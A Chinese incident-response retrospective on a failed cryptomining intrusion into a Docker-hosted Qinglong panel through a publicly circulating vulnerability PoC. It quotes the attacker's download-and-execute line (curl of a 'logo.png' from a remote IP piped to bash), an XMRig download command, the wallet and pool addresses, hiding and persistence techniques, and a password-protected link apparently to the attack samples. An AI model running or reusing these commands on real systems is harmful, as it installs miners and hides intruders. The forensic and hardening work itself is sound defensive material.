Docker青龙面板挖矿入侵事件应急复盘

东方隐侠安全团队-千里2026-03-13 10:13

这是一起典型的容器入侵事件,攻击者试图通过青龙面板漏洞投递挖矿木马。虽然攻击最终失败,但整个排查过程值得分享出来,一起记录和学习。

事件背景

那天我发现最近在青龙面板运行的脚本不再运行了,并且在互联网发现最近几天流行青龙面板的相关POC,感觉可能该服务器也可能受到相关影响。

这台服务器是我闲置的测试机(2核CPU,Ubuntu 22.04),跑些不重要的自动化脚本。既然不是什么核心业务,于是并没有尽快处理(别学我,高危漏洞要秒修),顺便保留了现场。

三天后,我抽时间,开始正式排查。

排查阶段

01

2.1 容器信息确认

由于是 Docker 部署,我先确认了几个前置信息:

复制代码 
docker ps -a

关键发现 :

  • 容器 ID :625cff7ff49c(青龙 2.18.0)
  • 挂载情况 :只映射 `/ql/data` ,没有挂载 Docker Socket(万幸,不然宿主机也凉了)
  • 容器状态 :Up 39hours (unhealthy)

⚠️ 注意:Unhealthy 说明容器内部可能已经有异常。

教训 :如果业务重要,这时候应该先备份数据卷,但我这个容器本来就是 unhealthy,直接进去看了。

2.2 检测阶段(Detection & Analysis)

进场第一件事:看进程,看网络。

复制代码 
docker exec -it 625cff7ff49c shps aux

输出很干净,没有异常进程,没有奇怪的 CPU 占用。但这只是表面------挖矿程序可能崩溃了,或者还没启动。

于是开始检查系统日志,读取到了该服务宕机后最后一天的日志。

可以发现,确实是受该漏洞影响,接口也为该POC接口。

在这个日志的最后,可以发现:

  • 日志中存在下载行为:
复制代码 
curl -sLk http://104.168.64.199/logo.png

并用 bash 执行操作

下载这个 logo.png 并解析可以发现:

  • 文件存在继续下载行为
  • 这是一个典型的 XMRig 挖矿恶意软件

攻击行为分析

02

3.1 攻击者行为一览

| 行为 | 说明 |
| 隐藏自身 | 使用 `/dev/shm/.kernel_data` (内存文件系统,重启消失但难检测) |
| 清除痕迹 | 禁用历史记录、清空日志、删除自身文件 |
| 下载挖矿程序 | 从 104.168.64.199 下载 XMRig 6.25.0 |
| 伪装进程 | 重命名为 `.sys_daemon` (隐藏文件,看起来像系统进程) |
| 资源窃取 | 占用 CPU 进行挖矿 |

持久化控制 写入 crontab(每15分钟检查一次),root 用户还会设置 `chattr +i` (不可删除)

3.2 攻击者使用的资源

  • 钱包地址 :

    4AE5D7Fz6dmMQp9Bj7239jdQzGBvPbQgP4bdDr6Y1iXSfTvEqNfHgBMH3ov3AcMy6tJPsZUfYfytUjcKfHjcpzxwPiQy7xP

  • 矿池地址 : 104.168.64.199:443

进一步排查

03

再开始地毯式搜索近期新增文件:

复制代码 
find / -mtime -9 -type f 2> /dev/null | grep -v -E "(proc|sys)" | head -50

可以发现异常:发现了华点

复制代码 
/home/.kworker` (8KB,隐藏文件)

根据这个释放的文件可以知道:攻击者执行的这个脚本,将文件都给下载加载到 /tmp/.tmp下了,而且还写日志到了这个目录里。

可以看到,攻击者下载的脚本应该是并未成功执行。如果日志显示和脚本"xmrig 下载失败,退出执行",那么既不会解压 tar 包残留,也不会生成可执行文件。

至此,再对这个 docker 容器和主机进行排查后,未发现服务器存在其他异常行为。

总结与教训

这应该是很简单的一次批量扫描脚本挖矿攻击。

5.1 攻击者画像

  • 攻击者使用空间搜索引擎搜索青龙面板的资产
  • 然后再利用攻击 POC 脚本对相关资产进行批量扫描攻击
  • 这样的攻击在互联网其实很常见
  • 攻击者使用的脚本含金量基本为0
  • 攻击行径基本透明,甚至攻击脚本都为 AI 写的(中文注释且都没对齐)
  • 只是稍微做了下 history 清除之类的,甚至脚本执行失败了也不管之前释放的 log 文件

5.2 攻击结果

幸运的是 :这次攻击并未被成功攻击。攻击失败的原因是:

复制代码 
wget -qO- https://github.com/xmrig/xmrig/releases/download/v6.25.0/xmrig-6.25.0-linux-static-x64.tar.gz | tar -xzf -

GitHub 返回错误导致该次攻击失败。

若被成功攻击,则还需要对服务器进行更详细的排查及考虑重置服务器防止留有后门等。

安全建议

青龙面板该漏洞已经修复,如若还未升级还望各位师傅尽快升级!

容器安全建议

  • 不要挂载 Docker Socket :这等同于给容器 root 权限,极易造成 docker 逃逸
  • 及时更新 :关注青龙面板的最新版本和安全公告
  • 网络隔离 :容器网络与宿主机分离
  • 定期巡检 :检查容器健康状态和异常日志

入侵排查要点

  1. 检查容器健康状态(unhealthy 通常是信号)

  2. 查看系统日志中的异常下载行为

  3. 排查近期新增的隐藏文件

  4. 检查 crontab 持久化任务

  5. 关注 `/dev/shm` 等内存文件系统

本次溯源文件:

https://qianlisecurity.lanzouu.com/b009hwofkj
密码:59mk

相关推荐
尤老师FPGA3 小时前
petalinux修改设备树添加vdma生成linux系统
android·linux·运维
yxy___3 小时前
达梦分布式集群DPC_重做副本-操作指南(DEM)_yxy
运维·分布式
月山知了3 小时前
linux kernel component子系统:基于rk3588 Android 14 kernel-6.1 display-subsystem代码分析
android·linux·运维
Y3ai4 小时前
Windows 11 Docker Desktop 保姆级安装使用教程
windows·docker·容器
星辰徐哥4 小时前
大模型工程化部署:Docker Compose批量部署
运维·docker·容器
SEO-狼术4 小时前
Support Network Diagnostics in .NET
运维·服务器·网络
AI周红伟4 小时前
AI自动盯盘与定时行情分析:OpenClaw股票辅助Agent集成完整使用指南-周红伟
运维·服务器·人工智能·音视频·火山引擎
不才小强4 小时前
Linux系统常用命令
linux·运维·网络
珠海西格电力5 小时前
鄂尔多斯零碳产业园管理系统的核心功能解析
大数据·运维·人工智能·物联网·能源
春日见6 小时前
Tool文件夹:瑞士军刀库
运维·服务器·windows·深度学习·自动驾驶
热门推荐
01GitHub 镜像站点02Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)032026年3月AI领域大事件:DeepSeek引领开源风暴04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05Mac 本地部署 OMLX + 通义千问 Qwen3.5-27B 保姆级教程06UV安装并设置国内源07黄金未来走势预测08AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南09让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南10纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!